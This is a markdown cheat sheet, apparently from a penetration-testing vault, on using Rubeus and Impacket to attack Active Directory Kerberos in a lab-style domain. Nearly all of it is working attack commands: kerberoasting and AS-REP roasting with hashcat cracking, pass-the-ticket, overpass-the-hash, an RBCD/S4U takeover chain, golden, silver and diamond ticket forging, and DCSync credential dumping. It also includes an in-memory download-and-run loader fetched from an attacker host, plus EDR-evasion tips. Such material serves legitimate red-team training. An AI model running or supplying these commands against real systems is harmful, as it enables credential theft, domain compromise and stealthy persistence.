rubeus.md (22377B)
1 --- 2 title: "Rubeus" 3 description: "Rubeus Kerberos abuse: kerberoast, asreproast, ticket forging, S4U, pass-the-ticket, overpass-the-hash." 4 category: active-directory 5 subcategory: "Tooling & Recon" 6 tags: [active-directory, kerberos, tickets] 7 tools: [Rubeus] 8 difficulty: advanced 9 updated: "2026-08-09" 10 source: "vault:ActiveDirectory/Rubeus.md" 11 --- 12 13 # Rubeus 14 15 Rubeus is a C# toolset for raw Kerberos interaction and abuse. It talks directly to the Windows Kerberos API and the KDC — it doesn't need admin rights for most operations and doesn't touch LSASS directly (unlike Mimikatz), making it stealthier. 16 17 **Core capabilities:** 18 - Request, harvest, inject, and forge Kerberos tickets 19 - Kerberoasting, AS-REP Roasting 20 - Pass-the-Ticket, Overpass-the-Hash 21 - S4U2Self/S4U2Proxy (RBCD/Delegation abuse) 22 - Golden/Silver/Diamond ticket creation (needs hashes) 23 24 ## Getting Rubeus onto a Target 25 26 ```powershell 27 # From your attacking machine — host it over HTTP 28 python3 -m http.server 80 29 30 # On target — download it 31 certutil -urlcache -f http://10.10.14.x/Rubeus.exe Rubeus.exe 32 iwr -uri http://10.10.14.x/Rubeus.exe -outfile Rubeus.exe 33 34 # If you have a shell via Evil-WinRM 35 upload Rubeus.exe 36 37 # Run in memory (avoids dropping to disk) — load .NET assembly 38 $data = (New-Object Net.WebClient).DownloadData('http://10.10.14.x/Rubeus.exe') 39 $assem = [System.Reflection.Assembly]::Load($data) 40 [Rubeus.Program]::Main("kerberoast".Split()) 41 ``` 42 43 ## Enumeration 44 45 ```powershell 46 # List all Kerberos tickets in current session 47 .\Rubeus.exe klist 48 49 # List tickets for ALL users (needs admin) 50 .\Rubeus.exe klist /all 51 52 # Dump all tickets from all sessions (admin required — touches LSASS) 53 .\Rubeus.exe dump 54 55 # Dump tickets for a specific service 56 .\Rubeus.exe dump /service:krbtgt 57 58 # Dump tickets from a specific LUID (logon session ID) 59 .\Rubeus.exe dump /luid:0x3e7 60 61 # Show Kerberos settings / current user info 62 .\Rubeus.exe currentluid 63 ``` 64 65 ## Harvesting Tickets 66 67 Harvest monitors for new 4768 (TGT request) events and captures tickets as users log in — useful for persistence during an engagement. 68 69 ```powershell 70 # Monitor and harvest TGTs from all new logons (admin required) 71 # Captures every TGT as it's issued — waits 30s between checks 72 .\Rubeus.exe harvest /interval:30 73 74 # Save harvested tickets to a directory 75 .\Rubeus.exe harvest /interval:30 /outdir:C:\tickets\ 76 77 # Harvest and immediately inject the first ticket found 78 .\Rubeus.exe harvest /interval:30 /nowrap 79 ``` 80 81 ## Kerberoasting 82 83 Request TGS tickets for accounts with SPNs set — the ticket is encrypted with the service account's password hash, which you then crack offline. 84 85 ```powershell 86 # Roast ALL accounts with SPNs 87 .\Rubeus.exe kerberoast 88 89 # Output to a file for hashcat/john 90 .\Rubeus.exe kerberoast /outfile:hashes.txt 91 92 # Only roast AES-capable accounts (more realistic, harder to crack) 93 .\Rubeus.exe kerberoast /aes 94 95 # Roast a specific user 96 .\Rubeus.exe kerberoast /user:svc_sql 97 98 # Roast with a specific TGT (if you have one) 99 .\Rubeus.exe kerberoast /ticket:doIFuD...base64... 100 101 # Roast using credentials (useful if you're on Linux or need to specify DC) 102 # -- Run from a domain-joined machine or with /domain /dc flags -- 103 .\Rubeus.exe kerberoast /creduser:DOMAIN\user /credpassword:Password123 104 105 # Force RC4 downgrade via TGT delegation trick (weaker, easier to crack) 106 .\Rubeus.exe kerberoast /tgtdeleg 107 108 # Nowrap — don't wrap long base64 output (easier to copy/paste) 109 .\Rubeus.exe kerberoast /outfile:hashes.txt /nowrap 110 ``` 111 112 **Crack with hashcat:** 113 ```bash 114 # Kerberoast (RC4) hashes are mode 13100 115 hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt 116 hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule 117 118 # AES-256 tickets use mode 19700, AES-128 use 19600 119 hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt 120 ``` 121 122 ## AS-REP Roasting 123 124 Targets accounts with "Do not require Kerberos preauthentication" — you can request an AS-REP without knowing the password, and the response contains an encrypted blob crackable offline. 125 126 ```powershell 127 # Roast all users without preauth set (needs valid domain user creds to query LDAP) 128 .\Rubeus.exe asreproast 129 130 # Save output for cracking 131 .\Rubeus.exe asreproast /outfile:asrep_hashes.txt 132 133 # Target a specific user 134 .\Rubeus.exe asreproast /user:jsmith 135 136 # Force RC4 (easier to crack) 137 .\Rubeus.exe asreproast /rc4opsec 138 139 # Nowrap for easy copy 140 .\Rubeus.exe asreproast /outfile:asrep_hashes.txt /nowrap 141 142 # From Linux with Impacket (no creds needed if you know usernames) 143 GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip 10.10.11.x -outputfile asrep.txt 144 ``` 145 146 **Crack with hashcat:** 147 ```bash 148 # AS-REP hashes are mode 18200 149 hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt 150 ``` 151 152 ## Requesting TGTs (asktgt) 153 154 Ask the KDC directly for a TGT using credentials or hashes. 155 156 ```powershell 157 # Request TGT with plaintext password 158 .\Rubeus.exe asktgt /user:administrator /password:Password123 /domain:PAINTERS.HTB /dc:dc.painters.htb 159 160 # Request TGT using NTLM hash (RC4 encryption) 161 .\Rubeus.exe asktgt /user:administrator /rc4:NTLM_HASH_HERE /domain:PAINTERS.HTB /ptt 162 163 # Request TGT using AES256 key (stealthier — preferred) 164 .\Rubeus.exe asktgt /user:administrator /aes256:AES_KEY_HERE /domain:PAINTERS.HTB /ptt 165 166 # Request TGT and save as .kirbi file (portable ticket format) 167 .\Rubeus.exe asktgt /user:svc_sql /rc4:HASH /domain:PAINTERS.HTB /outfile:svc_sql.kirbi 168 169 # Request TGT and get base64 blob (easy to copy) 170 .\Rubeus.exe asktgt /user:svc_sql /rc4:HASH /domain:PAINTERS.HTB /nowrap 171 172 # Request TGT and immediately inject (/ptt = pass the ticket) 173 .\Rubeus.exe asktgt /user:administrator /rc4:HASH /domain:PAINTERS.HTB /dc:dc.painters.htb /ptt 174 ``` 175 176 ## Pass-the-Ticket (PTT) 177 178 Take an existing ticket (base64 blob or .kirbi file) and inject it into your current session. 179 180 ```powershell 181 # Inject from base64 blob (paste the whole base64 string) 182 .\Rubeus.exe ptt /ticket:doIFuDCCBbSgAwIBBaED... 183 184 # Inject from .kirbi file 185 .\Rubeus.exe ptt /ticket:administrator.kirbi 186 187 # Verify it worked 188 .\Rubeus.exe klist 189 klist # built-in Windows command 190 191 # Purge all current Kerberos tickets (clean slate) 192 .\Rubeus.exe purge 193 194 # Purge tickets from a specific LUID 195 .\Rubeus.exe purge /luid:0x5e73f 196 197 # After PTT — test access 198 dir \\dc.painters.htb\c$ 199 net use \\dc.painters.htb\c$ 200 ``` 201 202 **Workflow with a TGT blob:** 203 ```powershell 204 # 1. Inject the TGT 205 .\Rubeus.exe ptt /ticket:doIFuDCCBbSgAwIBBaEDAgEWooIEujCCBLZhgg... 206 207 # 2. Ask for a CIFS service ticket (for file shares / PsExec) 208 .\Rubeus.exe asktgs /ticket:doIFuD... /service:cifs/dc.painters.htb /ptt 209 210 # 3. Ask for LDAP ticket (for DCSync) 211 .\Rubeus.exe asktgs /ticket:doIFuD... /service:ldap/dc.painters.htb /ptt 212 213 # 4. Ask for HTTP ticket (for WinRM) 214 .\Rubeus.exe asktgs /ticket:doIFuD... /service:http/dc.painters.htb /ptt 215 216 # 5. Ask for HOST ticket (for PsExec / remote task scheduling) 217 .\Rubeus.exe asktgs /ticket:doIFuD... /service:host/dc.painters.htb /ptt 218 ``` 219 220 ## Overpass-the-Hash (OPtH) 221 222 Convert an NTLM hash into a valid Kerberos TGT — lets you do Kerberos auth instead of NTLM, bypassing NTLM restrictions. 223 224 ```powershell 225 # Classic OPtH — inject TGT derived from NTLM hash 226 .\Rubeus.exe asktgt /user:administrator /rc4:NTLM_HASH /domain:PAINTERS.HTB /ptt 227 228 # Spawn a new process with the ticket injected (doesn't affect current session) 229 .\Rubeus.exe asktgt /user:administrator /rc4:HASH /domain:PAINTERS.HTB /createnetonly:C:\Windows\System32\cmd.exe 230 231 # Use AES256 for OPSEC (no RC4 downgrade logged) 232 .\Rubeus.exe asktgt /user:administrator /aes256:AES_KEY /domain:PAINTERS.HTB /opsec /ptt 233 ``` 234 235 ## Pass-the-Hash with Rubeus 236 237 Rubeus doesn't do traditional PTH (that's Mimikatz territory) but you can chain it: 238 239 ```powershell 240 # Step 1: Use the NTLM hash to get a TGT (Overpass-the-Hash) 241 .\Rubeus.exe asktgt /user:administrator /rc4:NTLM_HASH /domain:PAINTERS.HTB /nowrap 242 243 # Step 2: Inject that TGT 244 .\Rubeus.exe ptt /ticket:<base64_from_above> 245 246 # Step 3: Now use any tool — Kerberos will auth transparently 247 dir \\dc.painters.htb\c$ 248 ``` 249 250 For pure PTH (SMB, not Kerberos) — use Impacket from Linux instead: 251 ```bash 252 # Impacket PTH — no ticket needed 253 psexec.py PAINTERS/Administrator@10.10.11.x -hashes :NTLM_HASH 254 wmiexec.py PAINTERS/Administrator@10.10.11.x -hashes :NTLM_HASH 255 smbexec.py PAINTERS/Administrator@10.10.11.x -hashes :NTLM_HASH 256 ``` 257 258 ## Using Tickets with Evil-WinRM 259 260 Evil-WinRM supports Kerberos auth but it's easier from Linux using a `.ccache` file. 261 262 ### Method 1: From Linux with ccache (recommended) 263 264 ```bash 265 # Step 1: Get a TGT from Linux using Impacket (outputs .ccache) 266 getTGT.py PAINTERS.HTB/administrator -hashes :NTLM_HASH 267 getTGT.py PAINTERS.HTB/administrator -dc-ip 10.10.11.x 268 269 # OR convert a .kirbi (Windows format) to .ccache (Linux format) 270 ticketConverter.py admin.kirbi admin.ccache 271 272 # Step 2: Export the ccache as the KRB5CCNAME env variable 273 export KRB5CCNAME=/path/to/admin.ccache 274 275 # Step 3: Add domain to /etc/hosts 276 echo "10.10.11.x dc.painters.htb painters.htb" >> /etc/hosts 277 278 # Step 4: Connect with Evil-WinRM using Kerberos auth (use FQDN, not IP) 279 evil-winrm -i dc.painters.htb -r PAINTERS.HTB 280 281 # Step 5: Verify who you are 282 whoami 283 klist 284 ``` 285 286 ### Method 2: Dump from Windows, convert on Kali 287 288 ```powershell 289 # Dump the ticket from Windows to a file 290 .\Rubeus.exe dump /service:http /nowrap 291 # Copy the base64 output 292 ``` 293 294 ```bash 295 # Then on Kali: decode and convert 296 echo "doIFuD...base64..." | base64 -d > admin.kirbi 297 ticketConverter.py admin.kirbi admin.ccache 298 export KRB5CCNAME=admin.ccache 299 evil-winrm -i dc.painters.htb -r PAINTERS.HTB 300 ``` 301 302 ### Evil-WinRM Kerberos config on Kali 303 304 ```bash 305 # One-liner to generate /etc/krb5.conf (realm must be UPPERCASE) 306 cat > /etc/krb5.conf << EOF 307 [libdefaults] 308 default_realm = PAINTERS.HTB 309 dns_lookup_realm = false 310 dns_lookup_kdc = false 311 [realms] 312 PAINTERS.HTB = { 313 kdc = dc.painters.htb 314 admin_server = dc.painters.htb 315 } 316 [domain_realm] 317 .painters.htb = PAINTERS.HTB 318 painters.htb = PAINTERS.HTB 319 EOF 320 ``` 321 322 ## Using Tickets with PsExec 323 324 PsExec uses SMB (CIFS + IPC$) — you need a CIFS service ticket. 325 326 ### From Windows (Rubeus PTT → PsExec) 327 328 ```powershell 329 # Step 1: Inject TGT 330 .\Rubeus.exe ptt /ticket:doIFuD... 331 332 # Step 2: Request CIFS ticket (or it auto-derives from TGT) 333 .\Rubeus.exe asktgs /ticket:doIFuD... /service:cifs/dc.painters.htb /ptt 334 335 # Step 3: Run PsExec 336 .\PsExec.exe \\dc.painters.htb cmd.exe 337 .\PsExec.exe \\dc.painters.htb -s cmd.exe # -s = SYSTEM context 338 339 # Verify in the new session 340 whoami 341 hostname 342 ``` 343 344 ### Using Impacket psexec from Linux (more reliable) 345 346 ```bash 347 # With NTLM hash directly (PTH) 348 psexec.py PAINTERS/Administrator@10.10.11.x -hashes :NTLM_HASH 349 350 # With Kerberos ticket (ccache) 351 export KRB5CCNAME=admin.ccache 352 psexec.py -k -no-pass PAINTERS/Administrator@dc.painters.htb 353 354 # With password 355 psexec.py PAINTERS/Administrator:Password123@10.10.11.x 356 357 # Other Impacket exec tools (use same syntax) 358 wmiexec.py -k -no-pass PAINTERS/Administrator@dc.painters.htb # WMI — no service created 359 smbexec.py -k -no-pass PAINTERS/Administrator@dc.painters.htb # SMB — stealthier than psexec 360 atexec.py -k -no-pass PAINTERS/Administrator@dc.painters.htb "whoami" # Task scheduler 361 ``` 362 363 ## Using Tickets with Impacket Tools 364 365 ### Ticket Conversion (kirbi ↔ ccache) 366 367 ```bash 368 # Rubeus gives you base64 (.kirbi format internally); Impacket uses .ccache 369 echo "doIFuDCCBbSgAwIBBaED..." | base64 -d > ticket.kirbi 370 ticketConverter.py ticket.kirbi ticket.ccache 371 export KRB5CCNAME=/path/to/ticket.ccache 372 ``` 373 374 ### DCSync with secretsdump.py 375 376 ```bash 377 export KRB5CCNAME=admin.ccache 378 secretsdump.py -k -no-pass PAINTERS/Administrator@dc.painters.htb 379 380 # Dump just NTLM hashes 381 secretsdump.py -k -no-pass -just-dc-ntlm PAINTERS/Administrator@dc.painters.htb 382 383 # Dump specific user 384 secretsdump.py -k -no-pass -just-dc-user krbtgt PAINTERS/Administrator@dc.painters.htb 385 ``` 386 387 ### Full Impacket Kerberos Tool Reference 388 389 ```bash 390 # Get TGT (outputs .ccache automatically) 391 getTGT.py PAINTERS.HTB/user:password 392 getTGT.py PAINTERS.HTB/user -hashes :NTLM_HASH 393 export KRB5CCNAME=user.ccache 394 395 # Get TGS for specific service 396 getST.py -spn cifs/dc.painters.htb PAINTERS.HTB/user:password 397 getST.py -spn cifs/dc.painters.htb -hashes :HASH PAINTERS.HTB/user 398 399 # S4U impersonation (RBCD — see S4U section) 400 getST.py -spn cifs/dc.painters.htb -impersonate Administrator \ 401 -dc-ip 10.10.11.x PAINTERS.HTB/FAKE-COMP01$:Password123 402 403 # Kerberoast from Linux 404 GetUserSPNs.py PAINTERS.HTB/user:password -dc-ip 10.10.11.x -request 405 GetUserSPNs.py PAINTERS.HTB/user:password -dc-ip 10.10.11.x -request -outputfile kerberoast.txt 406 407 # AS-REP roast from Linux 408 GetNPUsers.py PAINTERS.HTB/ -usersfile users.txt -dc-ip 10.10.11.x -no-pass -outputfile asrep.txt 409 GetNPUsers.py PAINTERS.HTB/user:password -dc-ip 10.10.11.x -request # authenticated 410 ``` 411 412 > **Note —** Modern Impacket installs (pip/apt) also expose these as `impacket-getTGT`, `impacket-secretsdump`, etc. The `.py` example names still work when installed from source or when the examples are on PATH. 413 414 ## S4U Attacks (RBCD / Constrained Delegation) 415 416 ### S4U2Self + S4U2Proxy (Resource-Based Constrained Delegation) 417 418 The chain: you own a machine account → configure RBCD → impersonate any user for any service on the target. 419 420 **Full attack chain:** 421 ```powershell 422 # Prerequisites: 423 # 1. You have GenericWrite/GenericAll on a computer object (or can create machine accounts) 424 # 2. MachineAccountQuota > 0 (default is 10) 425 426 # Step 1: Create a fake computer account (Powermad) 427 Import-Module Powermad.ps1 428 New-MachineAccount -MachineAccount NETRUNNER-PC -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) 429 430 # Step 2: Get the NTLM hash of the fake computer's password 431 .\Rubeus.exe hash /password:Passw0rd! /user:NETRUNNER-PC$ /domain:PAINTERS.HTB 432 # Note the rc4_hmac value 433 434 # Step 3: Set RBCD on target — allow our fake PC to delegate 435 Set-ADComputer -Identity "DC" -PrincipalsAllowedToDelegateToAccount "NETRUNNER-PC$" 436 # Or using PowerView: 437 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-...NETRUNNER-PC$-SID)" 438 $SDBytes = New-Object byte[] ($SD.BinaryLength) 439 $SD.GetBinaryForm($SDBytes, 0) 440 Set-DomainObject -Identity DC -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} 441 442 # Step 4: S4U attack — impersonate Administrator for CIFS on DC 443 .\Rubeus.exe s4u /user:NETRUNNER-PC$ /rc4:NTLM_HASH_OF_PC \ 444 /impersonateuser:Administrator \ 445 /msdsspn:cifs/dc.painters.htb \ 446 /domain:PAINTERS.HTB \ 447 /dc:dc.painters.htb \ 448 /ptt 449 450 # Step 5: Use access 451 dir \\dc.painters.htb\c$ 452 .\PsExec.exe \\dc.painters.htb cmd.exe 453 454 # For different services — change /msdsspn: 455 /msdsspn:ldap/dc.painters.htb # DCSync 456 /msdsspn:http/dc.painters.htb # WinRM 457 /msdsspn:host/dc.painters.htb # Task scheduler / WMI 458 ``` 459 460 **RBCD from Linux (Impacket):** 461 ```bash 462 # Set RBCD attribute 463 rbcd.py -f NETRUNNER-PC -t DC -dc-ip 10.10.11.x 'PAINTERS.HTB/user:password' 464 465 # S4U attack 466 getST.py -spn cifs/dc.painters.htb -impersonate Administrator \ 467 -dc-ip 10.10.11.x 'PAINTERS.HTB/NETRUNNER-PC$:Passw0rd!' 468 469 export KRB5CCNAME=Administrator.ccache 470 secretsdump.py -k -no-pass PAINTERS/Administrator@dc.painters.htb 471 ``` 472 473 ## Golden Tickets 474 475 Forge a TGT using the **krbtgt** hash. Valid for 10 years by default. Works even if the real user's password changes. 476 477 ```powershell 478 # Prerequisites: krbtgt NTLM hash + Domain SID 479 480 # Step 1: Get domain SID (all but the last -XXXX of your own SID) 481 whoami /user 482 483 # Step 2: Craft golden ticket (AES256 preferred) 484 .\Rubeus.exe golden /aes256:KRBTGT_AES256_KEY \ 485 /user:Administrator \ 486 /domain:PAINTERS.HTB \ 487 /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX \ 488 /ptt 489 490 # With RC4 (NTLM hash of krbtgt) 491 .\Rubeus.exe golden /rc4:KRBTGT_NTLM_HASH \ 492 /user:FakeUser \ 493 /domain:PAINTERS.HTB \ 494 /sid:S-1-5-21-... \ 495 /ptt 496 497 # Save to file instead of injecting 498 .\Rubeus.exe golden /rc4:HASH /user:Administrator /domain:PAINTERS.HTB \ 499 /sid:S-1-5-21-... /outfile:golden.kirbi 500 501 # Verify 502 klist 503 dir \\dc.painters.htb\c$ 504 ``` 505 506 **From Linux (Impacket):** 507 ```bash 508 # ticketer.py creates .ccache golden tickets 509 ticketer.py -nthash KRBTGT_NTLM -domain-sid S-1-5-21-... \ 510 -domain PAINTERS.HTB Administrator 511 512 export KRB5CCNAME=Administrator.ccache 513 psexec.py -k -no-pass PAINTERS/Administrator@dc.painters.htb 514 ``` 515 516 ## Silver Tickets 517 518 Forge a TGS for a **specific service** using the **service account's** NTLM hash. More targeted and stealthier than golden (doesn't contact KDC). 519 520 ```powershell 521 # Forge a CIFS ticket (file shares, PsExec) using machine account hash 522 .\Rubeus.exe silver /rc4:MACHINE_ACCOUNT_NTLM \ 523 /user:Administrator \ 524 /service:cifs/dc.painters.htb \ 525 /domain:PAINTERS.HTB \ 526 /sid:S-1-5-21-... \ 527 /ptt 528 529 # Forge HTTP ticket (WinRM) 530 .\Rubeus.exe silver /rc4:HASH /user:Administrator \ 531 /service:http/dc.painters.htb \ 532 /domain:PAINTERS.HTB /sid:S-1-5-21-... /ptt 533 534 # Forge LDAP ticket (DCSync) 535 .\Rubeus.exe silver /rc4:HASH /user:Administrator \ 536 /service:ldap/dc.painters.htb \ 537 /domain:PAINTERS.HTB /sid:S-1-5-21-... /ptt 538 539 # Forge MSSQLSvc ticket (SQL Server) 540 .\Rubeus.exe silver /rc4:HASH /user:Administrator \ 541 /service:MSSQLSvc/sql.painters.htb:1433 \ 542 /domain:PAINTERS.HTB /sid:S-1-5-21-... /ptt 543 ``` 544 545 **Common service names for SPNs:** 546 547 | Service | SPN Prefix | Use Case | 548 |---------|-----------|----------| 549 | SMB/File | `cifs/` | File access, PsExec | 550 | WinRM | `http/` | Evil-WinRM, PS Remoting | 551 | LDAP | `ldap/` | DCSync, LDAP queries | 552 | WMI | `host/` | WMI execution | 553 | SQL Server | `MSSQLSvc/` | SQL auth | 554 | RDP | `TERMSRV/` | RDP access | 555 | Kerberos (golden) | `krbtgt/` | Get any ticket | 556 557 ## Diamond Tickets 558 559 Newer technique — modifies a real TGT rather than forging from scratch. Much harder for EDR to detect since the PAC is signed by the real KDC. 560 561 ```powershell 562 # Requires: krbtgt hash + user creds 563 .\Rubeus.exe diamond /tgtdeleg \ 564 /ticketuser:Administrator \ 565 /ticketuserid:500 \ 566 /groups:519 \ 567 /krbkey:KRBTGT_AES256 \ 568 /domain:PAINTERS.HTB \ 569 /dc:dc.painters.htb \ 570 /ptt 571 ``` 572 573 ## Ticket Renewal & Manipulation 574 575 ```powershell 576 # Renew a TGT before it expires 577 .\Rubeus.exe renew /ticket:doIFuD... 578 .\Rubeus.exe renew /ticket:admin.kirbi /ptt 579 580 # Auto-renew every 30 minutes 581 .\Rubeus.exe renew /ticket:doIFuD... /autorenew 582 583 # Describe a ticket (show its contents without cracking) 584 .\Rubeus.exe describe /ticket:doIFuD... 585 586 # Triage — show all tickets across all logon sessions (admin) 587 .\Rubeus.exe triage 588 589 # Convert kirbi to base64 and back 590 .\Rubeus.exe decode /ticket:doIFuD... 591 ``` 592 593 ## Roasting from Linux (Impacket alternatives) 594 595 When you're attacking from Kali and don't have a foothold yet (or don't want to drop Rubeus): 596 597 ```bash 598 # Kerberoast — needs valid credentials 599 GetUserSPNs.py PAINTERS.HTB/user:password -dc-ip 10.10.11.x -request 600 GetUserSPNs.py PAINTERS.HTB/user -hashes :NTLM -dc-ip 10.10.11.x -request -outputfile kerb.txt 601 602 # AS-REP roast — needs username list 603 GetNPUsers.py PAINTERS.HTB/ -usersfile users.txt -dc-ip 10.10.11.x -no-pass 604 GetNPUsers.py PAINTERS.HTB/user:password -dc-ip 10.10.11.x -request -outputfile asrep.txt 605 606 # Crack 607 hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt # Kerberoast 608 hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt # AS-REP 609 ``` 610 611 ## OPSEC Tips 612 613 - Use AES256 keys instead of RC4/NTLM — RC4 is flagged by modern EDR (`/aes256:KEY` instead of `/rc4:HASH`). 614 - Use the `/opsec` flag where available — Rubeus applies stealth measures. 615 - Use `/createnetonly` to spawn a hidden process with the ticket rather than injecting into your current session (avoids overwriting existing tickets). 616 - Request tickets from non-DC machines — S4U from a workstation is less suspicious than from the attacker machine directly. 617 - Use `/enctype:aes256` when requesting service tickets. 618 - Avoid `/dump` on modern environments — it touches LSASS and will trigger AV. Use `/dump /luid:SPECIFIC_LUID` instead of dumping everything. 619 - Diamond tickets > Golden tickets for stealth (EDR-evasive). 620 - Clean up: `.\Rubeus.exe purge` after you're done. 621 622 ## Common Errors & Fixes 623 624 | Error | Cause | Fix | 625 |-------|-------|-----| 626 | `KDC_ERR_PREAUTH_FAILED` | Wrong password/hash | Verify credentials/hash | 627 | `KDC_ERR_C_PRINCIPAL_UNKNOWN` | User doesn't exist | Check username spelling | 628 | `KDC_ERR_S_PRINCIPAL_UNKNOWN` | SPN doesn't exist | Verify SPN with `setspn -L user` | 629 | `KRB_AP_ERR_SKEW` | Clock skew > 5 min | `net time \\dc /set /yes` or `ntpdate dc.domain.htb` (or `faketime` on Linux) | 630 | `KRB_AP_ERR_TKT_EXPIRED` | Ticket too old | Request a new TGT | 631 | `ERROR_ACCESS_DENIED` on PsExec | No admin rights or wrong service ticket | Verify ticket SPN and user group membership | 632 | Kerberos errors in Evil-WinRM | `/etc/krb5.conf` wrong | Check realm name is UPPERCASE, DNS resolves | 633 | `No credentials cache found` | KRB5CCNAME not set | `export KRB5CCNAME=/path/to/ticket.ccache` | 634 | `KRB_AP_ERR_MODIFIED` | Wrong service account hash for silver ticket | Re-extract the correct machine/service account hash | 635 636 ## Quick Reference Card 637 638 ```text 639 HARVEST TICKETS: Rubeus.exe harvest /interval:30 640 GET TGT: Rubeus.exe asktgt /user:X /rc4:HASH /domain:D /ptt 641 INJECT TICKET: Rubeus.exe ptt /ticket:BASE64_OR_KIRBI 642 REQUEST TGS: Rubeus.exe asktgs /ticket:TGT /service:cifs/HOST /ptt 643 KERBEROAST: Rubeus.exe kerberoast /outfile:hashes.txt /nowrap 644 AS-REP ROAST: Rubeus.exe asreproast /outfile:hashes.txt /nowrap 645 LIST TICKETS: Rubeus.exe klist | klist 646 DUMP TICKETS: Rubeus.exe dump /nowrap 647 DESCRIBE TICKET: Rubeus.exe describe /ticket:BASE64 648 S4U ATTACK: Rubeus.exe s4u /user:PC$ /rc4:HASH /impersonateuser:Admin /msdsspn:cifs/HOST /ptt 649 GOLDEN TICKET: Rubeus.exe golden /rc4:KRBTGT_HASH /user:Admin /domain:D /sid:S-1-5-21-... /ptt 650 SILVER TICKET: Rubeus.exe silver /rc4:SVC_HASH /user:Admin /service:cifs/HOST /domain:D /sid:S /ptt 651 PURGE TICKETS: Rubeus.exe purge 652 653 LINUX EVIL-WINRM: export KRB5CCNAME=ticket.ccache && evil-winrm -i HOST -r REALM 654 LINUX PSEXEC: export KRB5CCNAME=ticket.ccache && psexec.py -k -no-pass DOMAIN/user@HOST 655 LINUX DCSYNC: export KRB5CCNAME=ticket.ccache && secretsdump.py -k -no-pass DOMAIN/user@HOST 656 CONVERT TICKET: ticketConverter.py ticket.kirbi ticket.ccache 657 ``` 658 659 For use in authorised engagements only.